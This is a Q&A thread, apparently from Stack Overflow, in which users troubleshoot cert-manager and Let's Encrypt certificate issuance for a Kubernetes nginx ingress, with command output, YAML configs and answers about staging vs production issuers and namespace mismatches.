The external IP that is allocated to the ingress-controller is the IP to which all incoming traffic should be routed. To enable this, add it to a DNS zone you control, for example as example.your-domain.com.
This quickstart assumes you know how to assign a DNS entry to an IP address and will do so.
DNS zone
domains.google.com
I can $ curl -kivL -H 'Host: singh.hbot.dev' 'http://singh.hbot.dev'
Here is the output of kuard
* Rebuilt URL to: http://singh.hbot.dev/
* Trying 35.247.160.2...
* TCP_NODELAY set
* Connected to singh.hbot.dev (35.247.160.2) port 80 (#0)
> GET / HTTP/1.1
> Host: singh.hbot.dev
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 308 Permanent Redirect
HTTP/1.1 308 Permanent Redirect
< Server: nginx/1.15.8
Server: nginx/1.15.8
< Date: Thu, 14 Mar 2019 08:59:24 GMT
Date: Thu, 14 Mar 2019 08:59:24 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 171
Content-Length: 171
< Connection: keep-alive
Connection: keep-alive
< Location: https://singh.hbot.dev/
Location: https://singh.hbot.dev/
<
* Ignoring the response-body
* Connection #0 to host singh.hbot.dev left intact
* Issue another request to this URL: 'https://singh.hbot.dev/'
* Trying 35.247.160.2...
* TCP_NODELAY set
* Connected to singh.hbot.dev (35.247.160.2) port 443 (#1)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:#STRENGTH
* successfully set certificate verify locations:
* CAfile: /etc/ssl/cert.pem
CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server accepted to use h2
* Server certificate:
* subject: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate
* start date: Mar 14 08:22:58 2019 GMT
* expire date: Mar 13 08:22:58 2020 GMT
* issuer: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate
* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fdf3000e200)
> GET / HTTP/2
> Host: singh.hbot.dev
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
HTTP/2 200
< server: nginx/1.15.8
server: nginx/1.15.8
< date: Thu, 14 Mar 2019 08:59:24 GMT
date: Thu, 14 Mar 2019 08:59:24 GMT
< content-type: text/html
content-type: text/html
< content-length: 1689
content-length: 1689
< vary: Accept-Encoding
vary: Accept-Encoding
< strict-transport-security: max-age=15724800; includeSubDomains
strict-transport-security: max-age=15724800; includeSubDomains
<
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>KUAR Demo</title>
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<link rel="stylesheet" href="/static/css/styles.css">
<script>
var pageContext = {"hostname":"kuard-79b5d46779-5slz8","addrs":["10.48.2.20"],"version":"v0.8.1-1","versionColor":"hsl(18,100%,50%)","requestDump":"GET / HTTP/1.1\r\nHost: singh.hbot.dev\r\nAccept: */*\r\nUser-Agent: curl/7.54.0\r\nX-Forwarded-For: 10.148.0.49\r\nX-Forwarded-Host: singh.hbot.dev\r\nX-Forwarded-Port: 443\r\nX-Forwarded-Proto: https\r\nX-Original-Uri: /\r\nX-Real-Ip: 10.148.0.49\r\nX-Request-Id: ba73c8e44498c36480ea0d4164279561\r\nX-Scheme: https","requestProto":"HTTP/1.1","requestAddr":"10.48.2.18:41748"}
</script>
</head>
<svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<symbol id="icon-power" viewBox="0 0 32 32">
<title>power</title>
<path class="path1" d="M12 0l-12 16h12l-8 16 28-20h-16l12-12z"></path>
</symbol>
<symbol id="icon-notification" viewBox="0 0 32 32">
<title>notification</title>
<path class="path1" d="M16 3c-3.472 0-6.737 1.352-9.192 3.808s-3.808 5.72-3.808 9.192c0 3.472 1.352 6.737 3.808 9.192s5.72 3.808 9.192 3.808c3.472 0 6.737-1.352 9.192-3.808s3.808-5.72 3.808-9.192c0-3.472-1.352-6.737-3.808-9.192s-5.72-3.808-9.192-3.808zM16 0v0c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16zM14 22h4v4h-4zM14 6h4v12h-4z"></path>
</symbol>
</defs>
</svg>
<body>
<div id="root"></div>
<script src="/built/bundle.js" type="text/javascript"></script>
</body>
</html>
* Connection #1 to host singh.hbot.dev left intact
Proceed on next steps
$ kubectl apply -f https://raw.githubusercontent.com/jetstack/cert-manager/release-0.7/deploy/manifests/00-crds.yaml
customresourcedefinition.apiextensions.k8s.io/certificates.certmanager.k8s.io created
customresourcedefinition.apiextensions.k8s.io/challenges.certmanager.k8s.io created
customresourcedefinition.apiextensions.k8s.io/clusterissuers.certmanager.k8s.io created
customresourcedefinition.apiextensions.k8s.io/issuers.certmanager.k8s.io created
customresourcedefinition.apiextensions.k8s.io/orders.certmanager.k8s.io created
$
$ kubectl apply \
> -f https://raw.githubusercontent.com/jetstack/cert-manager/release-0.7/deploy/manifests/00-crds.yaml
customresourcedefinition.apiextensions.k8s.io/certificates.certmanager.k8s.io configured
customresourcedefinition.apiextensions.k8s.io/challenges.certmanager.k8s.io configured
customresourcedefinition.apiextensions.k8s.io/clusterissuers.certmanager.k8s.io configured
customresourcedefinition.apiextensions.k8s.io/issuers.certmanager.k8s.io configured
customresourcedefinition.apiextensions.k8s.io/orders.certmanager.k8s.io configured
$
$ kubectl label namespace cert-manager certmanager.k8s.io/disable-validation="true"
namespace/cert-manager labeled
$
$ helm repo add jetstack https://charts.jetstack.io
"jetstack" has been added to your repositories
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Skip local chart repository
...Successfully got an update from the "jetstack" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈ Happy Helming!⎈
install cert-manager
$ helm install --name cert-manager --namespace cert-manager jetstack/cert-manager
NAME: cert-manager
LAST DEPLOYED: Thu Mar 14 16:06:48 2019
NAMESPACE: cert-manager
STATUS: DEPLOYED
RESOURCES:
==> v1/ClusterRole
NAME AGE
cert-manager-edit 3s
cert-manager-view 3s
cert-manager-webhook:webhook-requester 3s
==> v1/Pod(related)
NAME READY STATUS RESTARTS AGE
cert-manager-6f68b58796-w44tn 0/1 ContainerCreating 0 3s
cert-manager-cainjector-67b4696847-l2lhb 0/1 ContainerCreating 0 3s
cert-manager-webhook-6f58884b96-gh52r 0/1 ContainerCreating 0 3s
==> v1/Service
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
cert-manager-webhook ClusterIP 10.51.250.12 <none> 443/TCP 3s
==> v1/ServiceAccount
NAME SECRETS AGE
cert-manager 1 3s
cert-manager-cainjector 1 3s
cert-manager-webhook 1 3s
==> v1alpha1/Certificate
NAME AGE
cert-manager-webhook-ca 3s
cert-manager-webhook-webhook-tls 3s
==> v1alpha1/Issuer
NAME AGE
cert-manager-webhook-ca 2s
cert-manager-webhook-selfsign 3s
==> v1beta1/APIService
NAME AGE
v1beta1.admission.certmanager.k8s.io 3s
==> v1beta1/ClusterRole
NAME AGE
cert-manager 3s
cert-manager-cainjector 3s
==> v1beta1/ClusterRoleBinding
NAME AGE
cert-manager 3s
cert-manager-cainjector 3s
cert-manager-webhook:auth-delegator 3s
==> v1beta1/Deployment
NAME READY UP-TO-DATE AVAILABLE AGE
cert-manager 0/1 1 0 3s
cert-manager-cainjector 0/1 1 0 3s
cert-manager-webhook 0/1 1 0 3s
==> v1beta1/RoleBinding
NAME AGE
cert-manager-webhook:webhook-authentication-reader 3s
==> v1beta1/ValidatingWebhookConfiguration
NAME AGE
cert-manager-webhook 2s
NOTES:
cert-manager has been deployed successfully!
In order to begin issuing certificates, you will need to set up a ClusterIssuer
or Issuer resource (for example, by creating a 'letsencrypt-staging' issuer).
More information on the different types of issuers and how to configure them
can be found in our documentation:
https://docs.cert-manager.io/en/latest/reference/issuers.html
For information on how to configure cert-manager to automatically provision
Certificates for Ingress resources, take a look at the `ingress-shim`
documentation:
https://docs.cert-manager.io/en/latest/reference/ingress-shim.html
Apply modified staging-issuer.yaml and production-issuer.yaml.
$ kubectl apply -f staging-issuer.yaml
issuer.certmanager.k8s.io/letsencrypt-staging created
$ kubectl apply -f production-issuer.yaml
issuer.certmanager.k8s.io/letsencrypt-prod created
Edit my ingress.yaml and apply it with
kubernetes.io/ingress.class: "nginx"
certmanager.k8s.io/issuer: "letsencrypt-staging"
certmanager.k8s.io/acme-challenge-type: http01
I found the certificate, but when I describe it Events is none!
$ kubectl get certificate
NAME
quickstart-example-tls
$ kubectl describe certificate quickstart-example-tls
Name: quickstart-example-tls
Namespace: default
Labels: <none>
Annotations: <none>
API Version: certmanager.k8s.io/v1alpha1
Kind: Certificate
Metadata:
Creation Timestamp: 2019-03-14T09:17:11Z
Generation: 1
Owner References:
API Version: extensions/v1beta1
Block Owner Deletion: true
Controller: true
Kind: Ingress
Name: kuard
UID: f30e819b-4639-11e9-a2d5-42010a9400fd
Resource Version: 2243137
Self Link: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/certificates/quickstart-example-tls
UID: f311c99d-4639-11e9-a2d5-42010a9400fd
Spec:
Acme:
Config:
Domains:
singh.hbot.dev
Http 01:
Ingress Class: nginx
Dns Names:
singh.hbot.dev
Issuer Ref:
Kind: Issuer
Name: letsencrypt-staging
Secret Name: quickstart-example-tls
Status:
Conditions:
Last Transition Time: 2019-03-14T09:17:11Z
Message: Certificate is up to date and has not expired
Reason: Ready
Status: True
Type: Ready
Not After: 2019-06-12T08:16:05Z
Events: <none>
Then I check secret. The docs says
Once complete, cert-manager will have created a secret with the details of the certificate based on the secret used in the ingress resource. You can use the describe command as well to see some details:
Although I don't have ca.crt. I decided to moved on.
$ kubectl get secret
NAME TYPE DATA AGE
default-token-vnngd kubernetes.io/service-account-token 3 10d
letsencrypt-prod Opaque 1 3d1h
letsencrypt-staging Opaque 1 3d1h
quickstart-example-tls kubernetes.io/tls 3 3d1h
quickstart-nginx-ingress-token-c4tjk kubernetes.io/service-account-token 3 58m
singh-dev-staging-tls kubernetes.io/tls 3 21h
singh-secret kubernetes.io/tls 3 22h
$ kubectl describe secret quickstart-example-tls
Name: quickstart-example-tls
Namespace: default
Labels: certmanager.k8s.io/certificate-name=quickstart-example-tls
Annotations: certmanager.k8s.io/alt-names: singh.hbot.dev
certmanager.k8s.io/common-name: singh.hbot.dev
certmanager.k8s.io/ip-sans:
certmanager.k8s.io/issuer-kind: Issuer
certmanager.k8s.io/issuer-name: letsencrypt-staging
Type: kubernetes.io/tls
Data
====
tls.key: 1675 bytes
ca.crt: 0 bytes
tls.crt: 3545 bytes
Change ingress.yaml to be production and apply.
sixteen:cert-mgr hellohbot$ kubectl apply -f ingress.yaml
ingress.extensions/kuard created
Remove secret
sixteen:cert-mgr hellohbot$ kubectl delete secret quickstart-example-tls
secret "quickstart-example-tls" deleted
sixteen:cert-mgr hellohbot$ kubectl get certificate
NAME
quickstart-example-tls
sixteen:cert-mgr hellohbot$ kubectl describe certificate quickstart-example-tls
Name: quickstart-example-tls
Namespace: default
Labels: <none>
Annotations: <none>
API Version: certmanager.k8s.io/v1alpha1
Kind: Certificate
Metadata:
Creation Timestamp: 2019-03-14T09:32:45Z
Generation: 1
Owner References:
API Version: extensions/v1beta1
Block Owner Deletion: true
Controller: true
Kind: Ingress
Name: kuard
UID: 1fab9656-463c-11e9-a2d5-42010a9400fd
Resource Version: 2246373
Self Link: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/certificates/quickstart-example-tls
UID: 1facf771-463c-11e9-a2d5-42010a9400fd
Spec:
Acme:
Config:
Domains:
singh.hbot.dev
Http 01:
Ingress Class: nginx
Dns Names:
singh.hbot.dev
Issuer Ref:
Kind: Issuer
Name: letsencrypt-staging
Secret Name: quickstart-example-tls
Status:
Conditions:
Last Transition Time: 2019-03-14T09:34:06Z
Message: Certificate is up to date and has not expired
Reason: Ready
Status: True
Type: Ready
Not After: 2019-06-12T08:34:04Z
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal Generated 33s cert-manager Generated new private key
Normal GenerateSelfSigned 33s cert-manager Generated temporary self signed certificate
Normal OrderCreated 33s cert-manager Created Order resource "quickstart-example-tls-1671619353"
Normal OrderComplete 6s cert-manager Order "quickstart-example-tls-1671619353" completed successfully
Normal CertIssued 6s cert-manager Certificate issued successfully
Check order
$ kubectl describe order quickstart-example-tls-1671619353
Name: quickstart-example-tls-1671619353
Namespace: default
Labels: acme.cert-manager.io/certificate-name=quickstart-example-tls
Annotations: <none>
API Version: certmanager.k8s.io/v1alpha1
Kind: Order
Metadata:
Creation Timestamp: 2019-03-14T09:33:39Z
Generation: 1
Owner References:
API Version: certmanager.k8s.io/v1alpha1
Block Owner Deletion: true
Controller: true
Kind: Certificate
Name: quickstart-example-tls
UID: 1facf771-463c-11e9-a2d5-42010a9400fd
Resource Version: 2246369
Self Link: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/orders/quickstart-example-tls-1671619353
UID: 3fd25e87-463c-11e9-a2d5-42010a9400fd
Spec:
Config:
Domains:
singh.hbot.dev
Http 01:
Ingress Class: nginx
Csr: MIIC...RQ8=
Dns Names:
singh.hbot.dev
Issuer Ref:
Kind: Issuer
Name: letsencrypt-staging
Status:
Certificate: LS0t...LQo=
Challenges:
Authz URL: https://acme-staging-v02.api.letsencrypt.org/acme/authz/CkYZY5sWsaEq0uI2l1D2yyQwAjA1kl0_1uFsVY7UDqk
Config:
Http 01:
Ingress Class: nginx
Dns Name: singh.hbot.dev
Issuer Ref:
Kind: Issuer
Name: letsencrypt-staging
Key: tRxDXBXr_CYcEX1KzU9puQKg1pVZdmEXi7jGWyPAvTs.-kMH8oyhdhqKbua2D8gLPi8FxbeW7rYKBB6w1gMRw2w
Token: tRxDXBXr_CYcEX1KzU9puQKg1pVZdmEXi7jGWyPAvTs
Type: http-01
URL: https://acme-staging-v02.api.letsencrypt.org/acme/challenge/CkYZY5sWsaEq0uI2l1D2yyQwAjA1kl0_1uFsVY7UDqk/270336074
Wildcard: false
Finalize URL: https://acme-staging-v02.api.letsencrypt.org/acme/finalize/8521062/26692657
State: valid
URL: https://acme-staging-v02.api.letsencrypt.org/acme/order/8521062/26692657
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal Created 4m27s cert-manager Created Challenge resource "quickstart-example-tls-1671619353-0" for domain "singh.hbot.dev"
Normal OrderValid 4m cert-manager Order completed successfully
Solution:
Thanks to Harsh Manvar
Confirm my issuer url from the running issuer
$ kubectl get issuer letsencrypt-prod -o yaml
apiVersion: certmanager.k8s.io/v1alpha1
kind: Issuer
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"certmanager.k8s.io/v1alpha1","kind":"Issuer","metadata":{"annotations":{},"name":"letsencrypt-prod","namespace":"default"},"spec":{"acme":{"email":"contact#hbot.io","http01":{},"privateKeySecretRef":{"name":"letsencrypt-prod"},"server":"https://acme-v02.api.letsencrypt.org/directory"}}}
creationTimestamp: "2019-03-14T09:12:11Z"
generation: 1
name: letsencrypt-prod
namespace: default
resourceVersion: "2242148"
selfLink: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/issuers/letsencrypt-prod
uid: 405fa7af-4639-11e9-a2d5-42010a9400fd
spec:
acme:
email: contact#hbot.io
http01: {}
privateKeySecretRef:
name: letsencrypt-prod
server: https://acme-v02.api.letsencrypt.org/directory
status:
acme:
uri: https://acme-v02.api.letsencrypt.org/acme/acct/53068205
conditions:
- lastTransitionTime: "2019-03-14T09:12:12Z"
message: The ACME account was registered with the ACME server
reason: ACMEAccountRegistered
status: "True"
type: Ready
Check my ingress
$ kubectl get ingress --all-namespaces
NAMESPACE NAME HOSTS ADDRESS PORTS AGE
default kuard singh.hbot.dev 35.198.217.71 80, 443 43m
$ kubectl describe ingress
Name: kuard
Namespace: default
Address: 35.198.217.71
Default backend: default-http-backend:80 (10.48.0.7:8080)
TLS:
quickstart-example-tls terminates singh.hbot.dev
Rules:
Host Path Backends
---- ---- --------
singh.hbot.dev
/ kuard:80 (<none>)
Annotations:
certmanager.k8s.io/acme-challenge-type: http01
certmanager.k8s.io/issuer: letsencrypt-prod
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"certmanager.k8s.io/acme-challenge-type":"http01","certmanager.k8s.io/issuer":"letsencrypt-prod","kubernetes.io/ingress.class":"nginx"},"name":"kuard","namespace":"default"},"spec":{"rules":[{"host":"singh.hbot.dev","http":{"paths":[{"backend":{"serviceName":"kuard","servicePort":80},"path":"/"}]}}],"tls":[{"hosts":["singh.hbot.dev"],"secretName":"quickstart-example-tls"}]}}
kubernetes.io/ingress.class: nginx
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal CREATE 43m nginx-ingress-controller Ingress default/kuard
Normal CreateCertificate 43m cert-manager Successfully created Certificate "quickstart-example-tls"
Normal UPDATE 10m (x2 over 43m) nginx-ingress-controller Ingress default/kuard
Normal UpdateCertificate 10m cert-manager Successfully updated Certificate "quickstart-example-tls"
Change issuer to prod
sixteen:cert-mgr hellohbot$ kubectl apply -f ingress.yaml
ingress.extensions/kuard configured
Remove old secret to trigger the process.
sixteen:cert-mgr hellohbot$ kubectl get secret
NAME TYPE DATA AGE
default-token-vnngd kubernetes.io/service-account-token 3 10d
letsencrypt-prod Opaque 1 3d2h
letsencrypt-staging Opaque 1 3d2h
quickstart-example-tls kubernetes.io/tls 3 33m
quickstart-nginx-ingress-token-c4tjk kubernetes.io/service-account-token 3 103m
singh-dev-staging-tls kubernetes.io/tls 3 21h
singh-secret kubernetes.io/tls 3 23h
sixteen:cert-mgr hellohbot$ kubectl delete secret quickstart-example-tls
secret "quickstart-example-tls" deleted
Check the new certificate
sixteen:cert-mgr hellohbot$ kubectl get certificate
NAME
quickstart-example-tls
sixteen:cert-mgr hellohbot$ kubectl describe certificate
Name: quickstart-example-tls
Namespace: default
Labels: <none>
Annotations: <none>
API Version: certmanager.k8s.io/v1alpha1
Kind: Certificate
Metadata:
Creation Timestamp: 2019-03-14T09:32:45Z
Generation: 1
Owner References:
API Version: extensions/v1beta1
Block Owner Deletion: true
Controller: true
Kind: Ingress
Name: kuard
UID: 1fab9656-463c-11e9-a2d5-42010a9400fd
Resource Version: 2252545
Self Link: /apis/certmanager.k8s.io/v1alpha1/namespaces/default/certificates/quickstart-example-tls
UID: 1facf771-463c-11e9-a2d5-42010a9400fd
Spec:
Acme:
Config:
Domains:
singh.hbot.dev
Http 01:
Ingress Class: nginx
Dns Names:
singh.hbot.dev
Issuer Ref:
Kind: Issuer
Name: letsencrypt-prod
Secret Name: quickstart-example-tls
Status:
Conditions:
Last Transition Time: 2019-03-14T10:06:53Z
Message: Certificate issuance in progress. Temporary certificate issued.
Reason: TemporaryCertificate
Status: False
Type: Ready
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal OrderCreated 33m cert-manager Created Order resource "quickstart-example-tls-1671619353"
Normal OrderComplete 33m cert-manager Order "quickstart-example-tls-1671619353" completed successfully
Normal CertIssued 33m cert-manager Certificate issued successfully
Normal Generated 19s (x2 over 33m) cert-manager Generated new private key
Normal GenerateSelfSigned 19s (x2 over 33m) cert-manager Generated temporary self signed certificate
Normal Cleanup 19s cert-manager Deleting old Order resource "quickstart-example-tls-1671619353"
Normal OrderCreated 19s cert-manager Created Order resource "quickstart-example-tls-2367785339"
in ingress you are using issuer as letsencrypt-staging change it to production and also change tls-secrets it will work
Production url for let's encrypt issuer : https://acme-v02.api.letsencrypt.org/directory
in the issuer you have used the staging url of let's encypt staging server change it to production URL and again try to get tls.cert and key it will run with https://
staging certificate some time not work with https and browser give error it is for testing purpose.
cert-manager and nginx ingress and other things are looking perfect as it should have to be.
I followed https://docs.cert-manager.io/en/venafi/tutorials/quick-start/index.html from start to end and everything seems to be working except that I'm not getting an external ip for my ingress.
NAME HOSTS ADDRESS PORTS AGE
staging-site-ingress staging.site.io,staging.admin.site.io, 80, 443 1h
Altough I'm able to use the nginx ingress controller external ip and use dns to access the sites. When I'm going to the urls I'm being redirected to https, so I assume that's working fine.
It redirects to https but still says "not secured", so he don't get a certificate issued.
When I'm debugging I get the following information:
Ingress:
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal CreateCertificate 54m cert-manager Successfully created Certificate "tls-secret-staging"
Normal UPDATE 35m (x3 over 1h) nginx-ingress-controller Ingress staging/staging-site-ingress
Normal CreateCertificate 23m (x2 over 35m) cert-manager Successfully created Certificate "letsencrypt-staging-tls"
Certificate:
Status:
Conditions:
Last Transition Time: 2019-02-27T14:02:29Z
Message: Certificate does not exist
Reason: NotFound
Status: False
Type: Ready
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal OrderCreated 3m (x2 over 14m) cert-manager Created Order resource "letsencrypt-staging-tls-593754378"
Secret:
Name: letsencrypt-staging-tls
Namespace: staging
Labels: certmanager.k8s.io/certificate-name=staging-site-io
Annotations: <none>
Type: kubernetes.io/tls
Data
====
ca.crt: 0 bytes
tls.crt: 0 bytes
tls.key: 1679 bytes
Order:
Status:
Certificate: <nil>
Finalize URL:
Reason:
State:
URL:
Events: <none>
So it seems something goes wrong in order and no challenges are created.
Here are my ingress.yaml and issuer.yaml:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: staging-site-ingress
annotations:
kubernetes.io/ingress.class: "nginx"
certmanager.k8s.io/issuer: "letsencrypt-staging"
certmanager.k8s.io/acme-challenge-type: http01
spec:
tls:
- hosts:
- staging.site.io
- staging.admin.site.io
- staging.api.site.io
secretName: letsencrypt-staging-tls
rules:
- host: staging.site.io
http:
paths:
- backend:
serviceName: frontend-service
servicePort: 80
path: /
- host: staging.admin.site.io
http:
paths:
- backend:
serviceName: frontend-service
servicePort: 80
path: /
- host: staging.api.site.io
http:
paths:
- backend:
serviceName: gateway-service
servicePort: 9000
path: /
apiVersion: certmanager.k8s.io/v1alpha1
kind: Issuer
metadata:
name: letsencrypt-staging
namespace: staging
spec:
acme:
server: https://acme-staging-v02.api.letsencrypt.org/directory
email: hello#site.io
privateKeySecretRef:
name: letsencrypt-staging-tls
http01: {}
Anyone knows what I can do to fix this or what went wrong? Certmanager is installed correctly 100%, I'm just not sure about the ingress and what went wrong in the order.
Thanks in advance!
EDIT: I found this in the nginx-ingress-controller:
W0227 14:51:02.740081 8 controller.go:1078] Error getting SSL certificate "staging/letsencrypt-staging-tls": local SSL certificate staging/letsencrypt-staging-tls was not found. Using default certificate
It's getting spammed & the CPU load is always at 0.003 and the cpu graph is full (the other services are almost nothing)
I stumbled over the same issue once, following exactly the same official tutorial.
As #mikebridge mentioned, the issue is with Issuer/Secret's namespace mismatch.
For me, the best was to switch from Issuer to ClusterIssuer, which is not scoped to a single namespace.
The reason your certificate order is not completing is because the challenge is failing to successfully complete. Review your solver configuration in either your Issuer or ClusterIssuer.
See my answer here for more details.
https://stackoverflow.com/a/75454772/4820940